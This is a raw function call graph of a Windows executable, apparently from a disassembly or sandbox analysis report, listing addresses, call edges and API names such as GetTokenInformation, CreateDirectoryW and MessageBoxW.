17017->17019 17017->17024 17018 7ff6aae2c550 _log10_special 8 API calls 17020 7ff6aae33dea 17018->17020 17019->17022 17020->16954 17021 7ff6aae347c0 45 API calls 17025 7ff6aae33cdc 17021->17025 17022->17021 17022->17024 17022->17025 17023 7ff6aae3ea08 46 API calls 17023->17025 17024->17018 17025->17023 17025->17024 17258 7ff6aae30fc8 17026->17258 17030 7ff6aae3417e 17029->17030 17092 7ff6aae30b80 17030->17092 17035 7ff6aae342c3 17037 7ff6aae347c0 45 API calls 17035->17037 17038 7ff6aae34351 17035->17038 17036 7ff6aae347c0 45 API calls 17036->17035 17037->17038 17038->16985 17040 7ff6aae344c9 17039->17040 17041 7ff6aae3450e 17040->17041 17042 7ff6aae344e7 17040->17042 17043 7ff6aae347c0 45 API calls 17040->17043 17041->16985 17044 7ff6aae3ea08 46 API calls 17042->17044 17043->17042 17044->17041 17048 7ff6aae34579 17045->17048 17046 7ff6aae3a814 _invalid_parameter_noinfo 37 API calls 17047 7ff6aae345aa 17046->17047 17047->16985 17048->17046 17048->17047 17050 7ff6aae31d87 17049->17050 17051 7ff6aae31db6 17050->17051 17053 7ff6aae31e73 17050->17053 17055 7ff6aae31df3 17051->17055 17228 7ff6aae30c28 17051->17228 17054 7ff6aae3a814 _invalid_parameter_noinfo 37 API calls 17053->17054 17054->17055 17055->16985 17057 7ff6aae31977 17056->17057 17058 7ff6aae319a6 17057->17058 17060 7ff6aae31a63 17057->17060 17059 7ff6aae30c28 12 API calls 17058->17059 17062 7ff6aae319e3 17058->17062 17059->17062 17061 7ff6aae3a814 _invalid_parameter_noinfo 37 API calls 17060->17061 17061->17062 17062->16985 17064 7ff6aae346ef 17063->17064 17066 7ff6aae346f3 __crtLCMapStringW 17064->17066 17236 7ff6aae34748 17064->17236 17066->16985 17068 7ff6aae32197 17067->17068 17069 7ff6aae321c6 17068->17069 17071 7ff6aae32283 17068->17071 17070 7ff6aae30c28 12 API calls 17069->17070 17073 7ff6aae32203 17069->17073 17070->17073 17072 7ff6aae3a814 _invalid_parameter_noinfo 37 API calls 17071->17072 17072->17073 17073->16985 17075 7ff6aae347d7 17074->17075 17240 7ff6aae3d9b8 17075->17240 17082 7ff6aae3ea39 17080->17082 17089 7ff6aae3ea47 17080->17089 17081 7ff6aae3ea67 17084 7ff6aae3ea78 17081->17084 17085 7ff6aae3ea9f 17081->17085 17082->17081 17083 7ff6aae347c0 45 API calls 17082->17083 17082->17089 17083->17081 17248 7ff6aae400a0 17084->17248 17087 7ff6aae3eac9 17085->17087 17088 7ff6aae3eb2a 17085->17088 17085->17089 17087->17089 17251 7ff6aae3f8a0 17087->17251 17090 7ff6aae3f8a0 _fread_nolock MultiByteToWideChar 17088->17090 17089->16988 17090->17089 17093 7ff6aae30bb7 17092->17093 17099 7ff6aae30ba6 17092->17099 17094 7ff6aae3d5fc _fread_nolock 12 API calls 17093->17094 17093->17099 17095 7ff6aae30be4 17094->17095 17096 7ff6aae3a948 __free_lconv_mon 11 API calls 17095->17096 17098 7ff6aae30bf8 17095->17098 17096->17098 17097 7ff6aae3a948 __free_lconv_mon 11 API calls 17097->17099 17098->17097 17100 7ff6aae3e570 17099->17100 17101 7ff6aae3e58d 17100->17101 17103 7ff6aae3e5c0 17100->17103 17102 7ff6aae3a814 _invalid_parameter_noinfo 37 API calls 17101->17102 17112 7ff6aae342a1 17102->17112 17103->17101 17104 7ff6aae3e5f2 17103->17104 17109 7ff6aae3e705 17104->17109 17115 7ff6aae3e63a 17104->17115 17105 7ff6aae3e7f7 17155 7ff6aae3da5c 17105->17155 17107 7ff6aae3e7bd 17148 7ff6aae3ddf4 17107->17148 17109->17105 17109->17107 17110 7ff6aae3e78c 17109->17110 17111 7ff6aae3e74f 17109->17111 17114 7ff6aae3e745 17109->17114 17141 7ff6aae3e0d4 17110->17141 17131 7ff6aae3e304 17111->17131 17112->17035 17112->17036 17114->17107 17117 7ff6aae3e74a 17114->17117 17115->17112 17122 7ff6aae3a4a4 17115->17122 17117->17110 17117->17111 17120 7ff6aae3a900 _isindst 17 API calls 17121 7ff6aae3e854 17120->17121 17123 7ff6aae3a4bb 17122->17123 17124 7ff6aae3a4b1 17122->17124 17125 7ff6aae34f08 _get_daylight 11 API calls 17123->17125 17124->17123 17129 7ff6aae3a4d6 17124->17129 17126 7ff6aae3a4c2 17125->17126 17127 7ff6aae3a8e0 _invalid_parameter_noinfo 37 API calls 17126->17127 17128 7ff6aae3a4ce 17127->17128 17128->17112 17128->17120 17129->17128 17130 7ff6aae34f08 _get_daylight 11 API calls 17129->17130 17130->17126 17164 7ff6aae440ac 17131->17164 17135 7ff6aae3e3b0 17135->17112 17136 7ff6aae3e401 17217 7ff6aae3def0 17136->17217 17137 7ff6aae3e3ac 17137->17135 17137->17136 17139 7ff6aae3e3cc 17137->17139 17213 7ff6aae3e1ac 17139->17213 17142 7ff6aae440ac 38 API calls 17141->17142 17143 7ff6aae3e11e 17142->17143 17144 7ff6aae43af4 37 API calls 17143->17144 17145 7ff6aae3e16e 17144->17145 17146 7ff6aae3e172 17145->17146 17147 7ff6aae3e1ac 45 API calls 17145->17147 17146->17112 17147->17146 17149 7ff6aae440ac 38 API calls 17148->17149 17150 7ff6aae3de3f 17149->17150 17151 7ff6aae43af4 37 API calls 17150->17151 17152 7ff6aae3de97 17151->17152 17153 7ff6aae3de9b 17152->17153 17154 7ff6aae3def0 45 API calls 17152->17154 17153->17112 17154->17153 17156 7ff6aae3daa1 17155->17156 17157 7ff6aae3dad4 17155->17157 17158 7ff6aae3a814 _invalid_parameter_noinfo 37 API calls 17156->17158 17159 7ff6aae3daec 17157->17159 17162 7ff6aae3db6d 17157->17162 17161 7ff6aae3dacd memcpy_s 17158->17161 17160 7ff6aae3ddf4 46 API calls 17159->17160 17160->17161 17161->17112 17162->17161 17163 7ff6aae347c0 45 API calls 17162->17163 17163->17161 17165 7ff6aae440ff fegetenv 17164->17165 17166 7ff6aae47e2c 37 API calls 17165->17166 17170 7ff6aae44152 17166->17170 17167 7ff6aae4416d 17168 7ff6aae44242 17167->17168 17182 7ff6aae4417f 17167->17182 17169 7ff6aae47e2c 37 API calls 17168->17169 17171 7ff6aae4426c 17169->17171 17170->17167 17170->17168 17173 7ff6aae4421c 17170->17173 17174 7ff6aae47e2c 37 API calls 17171->17174 17172 7ff6aae3a4a4 __std_exception_copy 37 API calls 17175 7ff6aae441fd 17172->17175 17176 7ff6aae3a4a4 __std_exception_copy 37 API calls 17173->17176 17177 7ff6aae4427d 17174->17177 17178 7ff6aae45324 17175->17178 17183 7ff6aae44205 17175->17183 17176->17175 17180 7ff6aae48020 20 API calls 17177->17180 17179 7ff6aae3a900 _isindst 17 API calls 17178->17179 17181 7ff6aae45339 17179->17181 17191 7ff6aae442e6 memcpy_s 17180->17191 17182->17172 17184 7ff6aae2c550 _log10_special 8 API calls 17183->17184 17185 7ff6aae3e351 17184->17185 17209 7ff6aae43af4 17185->17209 17186 7ff6aae4468f memcpy_s 17187 7ff6aae449cf 17188 7ff6aae43c10 37 API calls 17187->17188 17195 7ff6aae450e7 17188->17195 17189 7ff6aae4497b 17189->17187 17192 7ff6aae4533c memcpy_s 37 API calls 17189->17192 17190 7ff6aae44327 memcpy_s 17203 7ff6aae44c6b memcpy_s 17190->17203 17204 7ff6aae44783 memcpy_s 17190->17204 17191->17186 17191->17190 17193 7ff6aae34f08 _get_daylight 11 API calls 17191->17193 17192->17187 17194 7ff6aae44760 17193->17194 17196 7ff6aae3a8e0 _invalid_parameter_noinfo 37 API calls 17194->17196 17198 7ff6aae4533c memcpy_s 37 API calls 17195->17198 17208 7ff6aae45142 17195->17208 17196->17190 17197 7ff6aae452c8 17199 7ff6aae47e2c 37 API calls 17197->17199 17198->17208 17199->17183 17200 7ff6aae34f08 11 API calls _get_daylight 17200->17203 17201 7ff6aae34f08 11 API calls _get_daylight 17201->17204 17202 7ff6aae3a8e0 37 API calls _invalid_parameter_noinfo 17202->17204 17203->17187 17203->17189 17203->17200 17206 7ff6aae3a8e0 37 API calls _invalid_parameter_noinfo 17203->17206 17204->17189 17204->17201 17204->17202 17205 7ff6aae43c10 37 API calls 17205->17208 17206->17203 17207 7ff6aae4533c memcpy_s 37 API calls 17207->17208 17208->17197 17208->17205 17208->17207 17210 7ff6aae43b13 17209->17210 17211 7ff6aae3a814 _invalid_parameter_noinfo 37 API calls 17210->17211 17212 7ff6aae43b3e memcpy_s 17210->17212 17211->17212 17212->17137 17214 7ff6aae3e1d8 memcpy_s 17213->17214 17214->17214 17215 7ff6aae347c0 45 API calls 17214->17215 17216 7ff6aae3e292 memcpy_s 17214->17216 17215->17216 17216->17135 17218 7ff6aae3df2b 17217->17218 17222 7ff6aae3df78 memcpy_s 17217->17222 17219 7ff6aae3a814 _invalid_parameter_noinfo 37 API calls 17218->17219 17220 7ff6aae3df57 17219->17220 17220->17135 17221 7ff6aae3dfe3 17223 7ff6aae3a4a4 __std_exception_copy 37 API calls 17221->17223 17222->17221 17224 7ff6aae347c0 45 API calls 17222->17224 17225 7ff6aae3e025 memcpy_s 17223->17225 17224->17221 17226 7ff6aae3a900 _isindst 17 API calls 17225->17226 17227 7ff6aae3e0d0 17226->17227 17229 7ff6aae30c4e 17228->17229 17230 7ff6aae30c5f 17228->17230 17229->17055 17230->17229 17231 7ff6aae3d5fc _fread_nolock 12 API calls 17230->17231 17232 7ff6aae30c90 17231->17232 17233 7ff6aae30ca4 17232->17233 17234 7ff6aae3a948 __free_lconv_mon 11 API calls 17232->17234 17235 7ff6aae3a948 __free_lconv_mon 11 API calls 17233->17235 17234->17233 17235->17229 17237 7ff6aae34766 17236->17237 17238 7ff6aae3476e 17236->17238 17239 7ff6aae347c0 45 API calls 17237->17239 17238->17066 17239->17238 17241 7ff6aae347ff 17240->17241 17242 7ff6aae3d9d1 17240->17242 17244 7ff6aae3da24 17241->17244 17242->17241 17243 7ff6aae43304 45 API calls 17242->17243 17243->17241 17245 7ff6aae3da3d 17244->17245 17247 7ff6aae3480f 17244->17247 17246 7ff6aae42650 45 API calls 17245->17246 17245->17247 17246->17247 17247->16988 17254 7ff6aae46d88 17248->17254 17253 7ff6aae3f8a9 MultiByteToWideChar 17251->17253 17255 7ff6aae46dec 17254->17255 17256 7ff6aae2c550 _log10_special 8 API calls 17255->17256 17257 7ff6aae400bd 17256->17257 17257->17089 17259 7ff6aae30ffd 17258->17259 17260 7ff6aae3100f 17258->17260 17261 7ff6aae34f08 _get_daylight 11 API calls 17259->17261 17263 7ff6aae3101d 17260->17263 17266 7ff6aae31059 17260->17266 17262 7ff6aae31002 17261->17262 17264 7ff6aae3a8e0 _invalid_parameter_noinfo 37 API calls 17262->17264 17265 7ff6aae3a814 _invalid_parameter_noinfo 37 API calls 17263->17265 17272 7ff6aae3100d 17264->17272 17265->17272 17267 7ff6aae313d5 17266->17267 17269 7ff6aae34f08 _get_daylight 11 API calls 17266->17269 17268 7ff6aae34f08 _get_daylight 11 API calls 17267->17268 17267->17272 17270 7ff6aae31669 17268->17270 17271 7ff6aae313ca 17269->17271 17273 7ff6aae3a8e0 _invalid_parameter_noinfo 37 API calls 17270->17273 17274 7ff6aae3a8e0 _invalid_parameter_noinfo 37 API calls 17271->17274 17272->16954 17273->17272 17274->17267 17276 7ff6aae30704 17275->17276 17303 7ff6aae30464 17276->17303 17278 7ff6aae3071d 17278->16606 17315 7ff6aae303bc 17279->17315 17283 7ff6aae2c850 17282->17283 17284 7ff6aae22930 GetCurrentProcessId 17283->17284 17285 7ff6aae21c80 49 API calls 17284->17285 17286 7ff6aae22979 17285->17286 17329 7ff6aae34984 17286->17329 17291 7ff6aae21c80 49 API calls 17292 7ff6aae229ff 17291->17292 17359 7ff6aae22620 17292->17359 17295 7ff6aae2c550 _log10_special 8 API calls 17296 7ff6aae22a31 17295->17296 17296->16645 17298 7ff6aae30119 17297->17298 17299 7ff6aae21b89 17297->17299 17300 7ff6aae34f08 _get_daylight 11 API calls 17298->17300 17299->16644 17299->16645 17301 7ff6aae3011e 17300->17301 17302 7ff6aae3a8e0 _invalid_parameter_noinfo 37 API calls 17301->17302 17302->17299 17304 7ff6aae304ce 17303->17304 17305 7ff6aae3048e 17303->17305 17304->17305 17307 7ff6aae304da 17304->17307 17306 7ff6aae3a814 _invalid_parameter_noinfo 37 API calls 17305->17306 17308 7ff6aae304b5 17306->17308 17314 7ff6aae3546c EnterCriticalSection 17307->17314 17308->17278 17316 7ff6aae303e6 17315->17316 17327 7ff6aae21a20 17315->17327 17317 7ff6aae303f5 memcpy_s 17316->17317 17318 7ff6aae30432 17316->17318 17316->17327 17320 7ff6aae34f08 _get_daylight 11 API calls 17317->17320 17328 7ff6aae3546c EnterCriticalSection 17318->17328 17322 7ff6aae3040a 17320->17322 17324 7ff6aae3a8e0 _invalid_parameter_noinfo 37 API calls 17322->17324 17324->17327 17327->16614 17327->16615 17330 7ff6aae349de 17329->17330 17331 7ff6aae34a03 17330->17331 17333 7ff6aae34a3f 17330->17333 17332 7ff6aae3a814 _invalid_parameter_noinfo 37 API calls 17331->17332 17346 7ff6aae34a2d 17332->17346 17368 7ff6aae32c10 17333->17368 17335 7ff6aae34b1c 17338 7ff6aae3a948 __free_lconv_mon 11 API calls 17335->17338 17337 7ff6aae2c550 _log10_special 8 API calls 17339 7ff6aae229c3 17337->17339 17338->17346 17347 7ff6aae35160 17339->17347 17340 7ff6aae34b40 17340->17335 17342 7ff6aae34b4a 17340->17342 17341 7ff6aae34af1 17343 7ff6aae3a948 __free_lconv_mon 11 API calls 17341->17343 17345 7ff6aae3a948 __free_lconv_mon 11 API calls 17342->17345 17343->17346 17344 7ff6aae34ae8 17344->17335 17344->17341 17345->17346 17346->17337 17348 7ff6aae3b2c8 _get_daylight 11 API calls 17347->17348 17349 7ff6aae35177 17348->17349 17350 7ff6aae3eb98 _get_daylight 11 API calls 17349->17350 17352 7ff6aae351b7 17349->17352 17356 7ff6aae229e5 17349->17356 17351 7ff6aae351ac 17350->17351 17353 7ff6aae3a948 __free_lconv_mon 11 API calls 17351->17353 17352->17356 17506 7ff6aae3ec20 17352->17506 17353->17352 17356->17291 17357 7ff6aae3a900 _isindst 17 API calls 17358 7ff6aae351fc 17357->17358 17360 7ff6aae2262f 17359->17360 17361 7ff6aae29390 2 API calls 17360->17361 17362 7ff6aae22660 17361->17362 17363 7ff6aae2266f MessageBoxW 17362->17363 17364 7ff6aae22683 MessageBoxA 17362->17364 17365 7ff6aae22690 17363->17365 17364->17365 17366 7ff6aae2c550 _log10_special 8 API calls 17365->17366 17367 7ff6aae226a0 17366->17367 17367->17295 17369 7ff6aae32c4e 17368->17369 17370 7ff6aae32c3e 17368->17370 17371 7ff6aae32c57 17369->17371 17380 7ff6aae32c85 17369->17380 17372 7ff6aae3a814 _invalid_parameter_noinfo 37 API calls 17370->17372 17373 7ff6aae3a814 _invalid_parameter_noinfo 37 API calls 17371->17373 17374 7ff6aae32c7d 17372->17374 17373->17374 17374->17335 17374->17340 17374->17341 17374->17344 17375 7ff6aae347c0 45 API calls 17375->17380 17377 7ff6aae32f34 17379 7ff6aae3a814 _invalid_parameter_noinfo 37 API calls 17377->17379 17379->17370 17380->17370 17380->17374 17380->17375 17380->17377 17382 7ff6aae335a0 17380->17382 17408 7ff6aae33268 17380->17408 17438 7ff6aae32af0 17380->17438 17383 7ff6aae33655 17382->17383 17384 7ff6aae335e2 17382->17384 17387 7ff6aae3365a 17383->17387 17388 7ff6aae336af 17383->17388 17385 7ff6aae335e8 17384->17385 17386 7ff6aae3367f 17384->17386 17393 7ff6aae335ed 17385->17393 17396 7ff6aae336be 17385->17396 17455 7ff6aae31b50 17386->17455 17389 7ff6aae3365c 17387->17389 17390 7ff6aae3368f 17387->17390 17388->17386 17388->17396 17406 7ff6aae33618 17388->17406 17392 7ff6aae335fd 17389->17392 17399 7ff6aae3366b 17389->17399 17462 7ff6aae31740 17390->17462 17407 7ff6aae336ed 17392->17407 17441 7ff6aae33f04 17392->17441 17393->17392 17397 7ff6aae33630 17393->17397 17393->17406 17396->17407 17469 7ff6aae31f60 17396->17469 17397->17407 17451 7ff6aae343c0 17397->17451 17399->17386 17401 7ff6aae33670 17399->17401 17403 7ff6aae34558 37 API calls 17401->17403 17401->17407 17402 7ff6aae2c550 _log10_special 8 API calls 17404 7ff6aae33983 17402->17404 17403->17406 17404->17380 17406->17407 17476 7ff6aae3e858 17406->17476 17407->17402 17409 7ff6aae33289 17408->17409 17410 7ff6aae33273 17408->17410 17411 7ff6aae3a814 _invalid_parameter_noinfo 37 API calls 17409->17411 17412 7ff6aae332c7 17409->17412 17410->17412 17413 7ff6aae33655 17410->17413 17414 7ff6aae335e2 17410->17414 17411->17412 17412->17380 17417 7ff6aae3365a 17413->17417 17418 7ff6aae336af 17413->17418 17415 7ff6aae335e8 17414->17415 17416 7ff6aae3367f 17414->17416 17423 7ff6aae335ed 17415->17423 17426 7ff6aae336be 17415->17426 17421 7ff6aae31b50 38 API calls 17416->17421 17419 7ff6aae3365c 17417->17419 17420 7ff6aae3368f 17417->17420 17418->17416 17418->17426 17436 7ff6aae33618 17418->17436 17422 7ff6aae335fd 17419->17422 17429 7ff6aae3366b 17419->17429 17424 7ff6aae31740 38 API calls 17420->17424 17421->17436 17425 7ff6aae33f04 47 API calls 17422->17425 17437 7ff6aae336ed 17422->17437 17423->17422 17427 7ff6aae33630 17423->17427 17423->17436 17424->17436 17425->17436 17428 7ff6aae31f60 38 API calls 17426->17428 17426->17437 17430 7ff6aae343c0 47 API calls 17427->17430 17427->17437 17428->17436 17429->17416 17431 7ff6aae33670 17429->17431 17430->17436 17433 7ff6aae34558 37 API calls 17431->17433 17431->17437 17432 7ff6aae2c550 _log10_special 8 API calls 17434 7ff6aae33983 17432->17434 17433->17436 17434->17380 17435 7ff6aae3e858 47 API calls 17435->17436 17436->17435 17436->17437 17437->17432 17489 7ff6aae30d14 17438->17489 17442 7ff6aae33f26 17441->17442 17443 7ff6aae30b80 12 API calls 17442->17443 17444 7ff6aae33f6e 17443->17444 17445 7ff6aae3e570 46 API calls 17444->17445 17446 7ff6aae34041 17445->17446 17447 7ff6aae347c0 45 API calls 17446->17447 17450 7ff6aae34063 17446->17450 17447->17450 17448 7ff6aae340ec 17448->17406 17448->17448 17449 7ff6aae347c0 45 API calls 17449->17448 17450->17448 17450->17449 17450->17450 17452 7ff6aae343d8 17451->17452 17454 7ff6aae34440 17451->17454 17453 7ff6aae3e858 47 API calls 17452->17453 17452->17454 17453->17454 17454->17406 17456 7ff6aae31b83 17455->17456 17457 7ff6aae31bb2 17456->17457 17459 7ff6aae31c6f 17456->17459 17458 7ff6aae30b80 12 API calls 17457->17458 17461 7ff6aae31bef 17457->17461 17458->17461 17460 7ff6aae3a814 _invalid_parameter_noinfo 37 API calls 17459->17460 17460->17461 17461->17406 17463 7ff6aae31773 17462->17463 17464 7ff6aae317a2 17463->17464 17466 7ff6aae3185f 17463->17466 17465 7ff6aae30b80 12 API calls 17464->17465 17468 7ff6aae317df 17464->17468 17465->17468 17467 7ff6aae3a814 _invalid_parameter_noinfo 37 API calls 17466->17467 17467->17468 17468->17406 17470 7ff6aae31f93 17469->17470 17471 7ff6aae31fc2 17470->17471 17473 7ff6aae3207f 17470->17473 17472 7ff6aae30b80 12 API calls 17471->17472 17475 7ff6aae31fff 17471->17475 17472->17475 17474 7ff6aae3a814 _invalid_parameter_noinfo 37 API calls 17473->17474 17474->17475 17475->17406 17477 7ff6aae3e880 17476->17477 17478 7ff6aae3e8c5 17477->17478 17479 7ff6aae347c0 45 API calls 17477->17479 17482 7ff6aae3e885 memcpy_s 17477->17482 17485 7ff6aae3e8ae memcpy_s 17477->17485 17478->17482 17478->17485 17486 7ff6aae407e8 17478->17486 17479->17478 17480 7ff6aae3a814 _invalid_parameter_noinfo 37 API calls 17480->17482 17482->17406 17485->17480 17485->17482 17488 7ff6aae4080c WideCharToMultiByte 17486->17488 17490 7ff6aae30d41 17489->17490 17491 7ff6aae30d53 17489->17491 17492 7ff6aae34f08 _get_daylight 11 API calls 17490->17492 17494 7ff6aae30d60 17491->17494 17497 7ff6aae30d9d 17491->17497 17493 7ff6aae30d46 17492->17493 17495 7ff6aae3a8e0 _invalid_parameter_noinfo 37 API calls 17493->17495 17496 7ff6aae3a814 _invalid_parameter_noinfo 37 API calls 17494->17496 17502 7ff6aae30d51 17495->17502 17496->17502 17498 7ff6aae30e46 17497->17498 17499 7ff6aae34f08 _get_daylight 11 API calls 17497->17499 17500 7ff6aae34f08 _get_daylight 11 API calls 17498->17500 17498->17502 17503 7ff6aae30e3b 17499->17503 17501 7ff6aae30ef0 17500->17501 17504 7ff6aae3a8e0 _invalid_parameter_noinfo 37 API calls 17501->17504 17502->17380 17505 7ff6aae3a8e0 _invalid_parameter_noinfo 37 API calls 17503->17505 17504->17502 17505->17498 17510 7ff6aae3ec3d 17506->17510 17507 7ff6aae3ec42 17508 7ff6aae351dd 17507->17508 17509 7ff6aae34f08 _get_daylight 11 API calls 17507->17509 17508->17356 17508->17357 17511 7ff6aae3ec4c 17509->17511 17510->17507 17510->17508 17513 7ff6aae3ec8c 17510->17513 17512 7ff6aae3a8e0 _invalid_parameter_noinfo 37 API calls 17511->17512 17512->17508 17513->17508 17514 7ff6aae34f08 _get_daylight 11 API calls 17513->17514 17514->17511 17516 7ff6aae285b1 GetTokenInformation 17515->17516 17517 7ff6aae28633 __vcrt_freefls 17515->17517 17518 7ff6aae285dd 17516->17518 17519 7ff6aae285d2 GetLastError 17516->17519 17520 7ff6aae28646 CloseHandle 17517->17520 17521 7ff6aae2864c 17517->17521 17518->17517 17522 7ff6aae285f9 GetTokenInformation 17518->17522 17519->17517 17519->17518 17520->17521 17521->16663 17522->17517 17523 7ff6aae2861c 17522->17523 17523->17517 17524 7ff6aae28626 ConvertSidToStringSidW 17523->17524 17524->17517 17526 7ff6aae2c850 17525->17526 17527 7ff6aae22b74 GetCurrentProcessId 17526->17527 17528 7ff6aae226b0 48 API calls 17527->17528 17529 7ff6aae22bc7 17528->17529 17530 7ff6aae34bd8 48 API calls 17529->17530 17531 7ff6aae22c10 MessageBoxW 17530->17531 17532 7ff6aae2c550 _log10_special 8 API calls 17531->17532 17533 7ff6aae22c40 17532->17533 17533->16674 17535 7ff6aae225e5 17534->17535 17536 7ff6aae34bd8 48 API calls 17535->17536 17537 7ff6aae22604 17536->17537 17537->16688 17583 7ff6aae38794 17538->17583 17542 7ff6aae281dc 17541->17542 17543 7ff6aae29390 2 API calls 17542->17543 17544 7ff6aae281fb 17543->17544 17545 7ff6aae28216 ExpandEnvironmentStringsW 17544->17545 17546 7ff6aae28203 17544->17546 17548 7ff6aae2823c __vcrt_freefls 17545->17548 17547 7ff6aae22810 49 API calls 17546->17547 17549 7ff6aae2820f __vcrt_freefls 17547->17549 17550 7ff6aae28240 17548->17550 17551 7ff6aae28253 17548->17551 17553 7ff6aae2c550 _log10_special 8 API calls 17549->17553 17552 7ff6aae22810 49 API calls 17550->17552 17555 7ff6aae282bf 17551->17555 17559 7ff6aae28261 17551->17559 17552->17549 17554 7ff6aae283af 17553->17554 17554->16687 17573 7ff6aae38238 17554->17573 17556 7ff6aae37e08 45 API calls 17555->17556 17558 7ff6aae282d1 17556->17558 17557 7ff6aae28285 GetDriveTypeW 17560 7ff6aae282b0 17557->17560 17561 7ff6aae28295 17557->17561 17563 7ff6aae282d9 17558->17563 17566 7ff6aae282ec 17558->17566 17559->17557 17559->17559 17706 7ff6aae3796c 17560->17706 17564 7ff6aae22810 49 API calls 17561->17564 17565 7ff6aae22810 49 API calls 17563->17565 17564->17549 17565->17549 17567 7ff6aae2834e CreateDirectoryW 17566->17567 17569 7ff6aae226b0 48 API calls 17566->17569 17567->17549 17568 7ff6aae2835d GetLastError 17567->17568 17568->17549 17570 7ff6aae2836a GetLastError 17568->17570 17571 7ff6aae28328 CreateDirectoryW 17569->17571 17572 7ff6aae22c50 51 API calls 17570->17572 17571->17566 17572->17549 17574 7ff6aae38258 17573->17574 17575 7ff6aae38245 17573->17575 17722 7ff6aae37ebc 17574->17722 17577 7ff6aae34f08 _get_daylight 11 API calls 17575->17577 17579 7ff6aae3824a 17577->17579 17580 7ff6aae3a8e0 _invalid_parameter_noinfo 37 API calls 17579->17580 17582 7ff6aae38256 17580->17582 17582->16693 17624 7ff6aae41558 17583->17624 17683 7ff6aae412d0 17624->17683 17704 7ff6aae402d8 EnterCriticalSection 17683->17704 17707 7ff6aae379bd 17706->17707 17708 7ff6aae3798a 17706->17708 17707->17549 17708->17707 17713 7ff6aae40474 17708->17713 17711 7ff6aae3a900 _isindst 17 API calls 17714 7ff6aae40481 17713->17714 17715 7ff6aae4048b 17713->17715 17714->17715 17720 7ff6aae404a7 17714->17720 17716 7ff6aae34f08 _get_daylight 11 API calls 17715->17716 17717 7ff6aae40493 17716->17717 17719 7ff6aae3a8e0 _invalid_parameter_noinfo 37 API calls 17717->17719 17718 7ff6aae379b9 17718->17707 17718->17711 17719->17718 17720->17718 17721 7ff6aae34f08 _get_daylight 11 API calls 17720->17721 17721->17717 17729 7ff6aae402d8 EnterCriticalSection 17722->17729 17731 7ff6aae2456a 17730->17731 17732 7ff6aae29390 2 API calls 17731->17732 17733 7ff6aae2458f 17732->17733 17734 7ff6aae2c550 _log10_special 8 API calls 17733->17734 17735 7ff6aae245b7 17734->17735 17735->16720 17737 7ff6aae27e2e 17736->17737 17738 7ff6aae27f52 17737->17738 17739 7ff6aae21c80 49 API calls 17737->17739 17740 7ff6aae2c550 _log10_special 8 API calls 17738->17740 17744 7ff6aae27eb5 17739->17744 17741 7ff6aae27f83 17740->17741 17741->16720 17742 7ff6aae21c80 49 API calls 17742->17744 17743 7ff6aae24560 10 API calls 17743->17744 17744->17738 17744->17742 17744->17743 17745 7ff6aae29390 2 API calls 17744->17745 17746 7ff6aae27f23 CreateDirectoryW 17745->17746 17746->17738 17746->17744 17748 7ff6aae21637 17747->17748 17749 7ff6aae21613 17747->17749 17750 7ff6aae245c0 108 API calls 17748->17750 17870 7ff6aae21050 17749->17870 17752 7ff6aae2164b 17750->17752 17754 7ff6aae21653 17752->17754 17755 7ff6aae21682 17752->17755 17753 7ff6aae21618 17756 7ff6aae2162e 17753->17756 17759 7ff6aae22710 54 API calls 17753->17759 17757 7ff6aae34f08 _get_daylight 11 API calls 17754->17757 17758 7ff6aae245c0 108 API calls 17755->17758 17756->16720 17760 7ff6aae21658 17757->17760 17761 7ff6aae21696 17758->17761 17759->17756 17762 7ff6aae22910 54 API calls 17760->17762 17763 7ff6aae216b8 17761->17763 17764 7ff6aae2169e 17761->17764 17766 7ff6aae21671 17762->17766 17765 7ff6aae306d4 73 API calls 17763->17765 17767 7ff6aae22710 54 API calls 17764->17767 17768 7ff6aae216cd 17765->17768 17766->16720 17769 7ff6aae216ae 17767->17769 17770 7ff6aae216f9 17768->17770 17771 7ff6aae216d1 17768->17771 17774 7ff6aae3004c 74 API calls 17769->17774 17773 7ff6aae216ff 17770->17773 17779 7ff6aae21717 17770->17779 17772 7ff6aae34f08 _get_daylight 11 API calls 17771->17772 17775 7ff6aae216d6 17772->17775 17846 7ff6aae21210 17773->17846 17777 7ff6aae21829 17774->17777 17778 7ff6aae22910 54 API calls 17775->17778 17777->16720 17786 7ff6aae216ef __vcrt_freefls 17778->17786 17780 7ff6aae21739 17779->17780 17791 7ff6aae21761 17779->17791 17782 7ff6aae34f08 _get_daylight 11 API calls 17780->17782 17781 7ff6aae3004c 74 API calls 17781->17769 17783 7ff6aae2173e 17782->17783 17784 7ff6aae22910 54 API calls 17783->17784 17784->17786 17785 7ff6aae3039c _fread_nolock 53 API calls 17785->17791 17786->17781 17787 7ff6aae217da 17788 7ff6aae34f08 _get_daylight 11 API calls 17787->17788 17790 7ff6aae217ca 17788->17790 17793 7ff6aae22910 54 API calls 17790->17793 17791->17785 17791->17786 17791->17787 17792 7ff6aae217c5 17791->17792 17901 7ff6aae30adc 17791->17901 17794 7ff6aae34f08 _get_daylight 11 API calls 17792->17794 17793->17786 17794->17790 17796 7ff6aae2718b 17795->17796 17798 7ff6aae27144 17795->17798 17796->16720 17798->17796 17938 7ff6aae35024 17798->17938 17800 7ff6aae241a1 17799->17800 17801 7ff6aae244e0 49 API calls 17800->17801 17802 7ff6aae241db 17801->17802 17803 7ff6aae244e0 49 API calls 17802->17803 17804 7ff6aae241eb 17803->17804 17805 7ff6aae2420d 17804->17805 17806 7ff6aae2423c 17804->17806 17953 7ff6aae24110 17805->17953 17808 7ff6aae24110 51 API calls 17806->17808 17809 7ff6aae2423a 17808->17809 17810 7ff6aae24267 17809->17810 17811 7ff6aae2429c 17809->17811 17960 7ff6aae27cf0 17810->17960 17813 7ff6aae24110 51 API calls 17811->17813 17815 7ff6aae242c0 17813->17815 17816 7ff6aae24110 51 API calls 17815->17816 17824 7ff6aae24312 17815->17824 17819 7ff6aae242e9 17816->17819 17817 7ff6aae24393 17820 7ff6aae21950 115 API calls 17817->17820 17818 7ff6aae22710 54 API calls 17822 7ff6aae24297 17818->17822 17819->17824 17826 7ff6aae24110 51 API calls 17819->17826 17823 7ff6aae2439d 17820->17823 17821 7ff6aae2c550 _log10_special 8 API calls 17825 7ff6aae24435 17821->17825 17822->17821 17827 7ff6aae243fe 17823->17827 17828 7ff6aae243a5 17823->17828 17824->17817 17830 7ff6aae2438c 17824->17830 17831 7ff6aae24317 17824->17831 17834 7ff6aae2437b 17824->17834 17825->16720 17826->17824 17829 7ff6aae22710 54 API calls 17827->17829 17986 7ff6aae21840 17828->17986 17829->17831 17830->17828 17830->17831 17835 7ff6aae22710 54 API calls 17831->17835 17838 7ff6aae22710 54 API calls 17834->17838 17835->17822 17836 